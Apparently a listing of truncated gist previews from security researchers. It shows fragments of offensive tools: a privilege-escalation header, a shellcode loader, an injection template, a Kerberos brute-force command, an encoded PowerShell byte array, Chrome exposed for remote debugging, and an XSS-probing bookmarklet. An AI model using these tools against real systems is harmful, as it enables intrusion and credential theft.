antonioCoco

// TcbElevation - Authors: @splinter_code and @decoder_it

#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>

#pragma comment(lib, "Secur32.lib")

void EnableTcbPrivilege(BOOL enforceCheck);

bohops

//original runner by @Arno0x: https://github.com/Arno0x/CSharpScripts/blob/master/shellcodeLauncher.cs

using System;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;

namespace ShellcodeLoader
{
    class Program

andyrobbins

## Find dangerous API permissions as a user

$AzureTenantID = '<Your tenant ID>'
$AccountName = '<Username>@<Domain.com>'
$Password = ConvertTo-SecureString '<Your password>' -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential($AccountName, $Password)
Connect-AzAccount -Credential $Credential -TenantID $AzureTenantID

function Get-AzureGraphToken
{

gprudhomme-x

#/bin/bash
session=ntlmscript

if [ -z "$1" ]; then
    echo "No hashfile supplied"
    exit
fi
hashfile=$1
if [ ! -f $hashfile ]; then
   echo "[ERROR] File not exists."

HoLyVieR

               TEAM               | POINTS |   LAST SUBMIT     
----------------------------------+--------+-------------------
  <CA> HubrETS Hackin''           |    155 | 2020/05/17 14:58  
  <CA> Les Gentils Pirates        |    133 | 2020/05/17 14:42  
  <CA> CLICKESTI                  |    129 | 2020/05/17 14:07  
  <US> Skiddies as a Service      |    125 | 2020/05/17 14:44  
  <CA> cold_root                  |    116 | 2020/05/17 14:38  
  <CA> Panique Au Village         |     94 | 2020/05/17 14:47  
  <CA> Shopify                    |     84 | 2020/05/17 14:47  
  <CA> segfaults                  |     77 | 2020/05/17 14:55  

monoxgas

#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>

DWORD WINAPI Thread(LPVOID lpParam) {
	// Insert evil stuff

	ExitProcess(0);

NotMedic

Target

Start Chrome with the following flags:

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"

--remote-debugging-port=9222

--remote-debugging-address=0.0.0.0

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

jkamdjou

$a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67,

Rhynorater

javascript:(function()%7Bvar j %3D document.getElementsByTagName("input")%3Bif (document.location.href.indexOf("%3F")>-1)%7Bvar l %3D "%26"%3B%7Delse%7Bvar l %3D "%3F"%3B%7Dfor (i%3D0%3Bi<j.length%3Bi%2B%2B)%7Bl%2B%3Dj%5Bi%5D.getAttribute("name")%2B'%3D"><test1234>%26'%7Ddocument.location %3D document.location%2Bl%7D)()